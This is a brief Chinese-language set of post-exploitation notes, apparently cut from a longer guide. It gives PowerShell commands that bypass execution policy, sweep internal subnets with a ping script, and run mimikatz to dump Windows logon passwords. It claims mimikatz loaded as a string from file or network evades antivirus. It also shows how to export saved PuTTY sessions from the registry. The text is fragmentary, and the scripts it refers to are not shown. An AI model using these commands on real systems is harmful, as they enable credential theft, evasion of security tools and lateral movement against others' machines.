1, 保存下面脚本为batchPing.ps1
2, 执行命令
powershell -ep bypass ./batchPing.ps1 -ipStr 192.168.1-2.1-254 -outFile c:\out.txt
1,Powershell是白名单程序,可以稳定执行
2,mimikatz的二进制内容的字符串可以以文件,网络等方式存在,方便嵌套调用和免杀
powershell -ep bypass ./fk.ps1 privilege::debug sekurlsa::logonpasswords exit
对于当前用户,Putty会话保存在HKCU\Software\SimonTatham\PuTTY\Sessions下,可以直接用
reg export HKCU\Software\SimonTatham\PuTTY\Sessions c:\programdata\endpoint\putty.reg
进行导出查看
如果想要获得本机所有用户的,则可以使用以下powershell脚本批量获取(管理员权限)。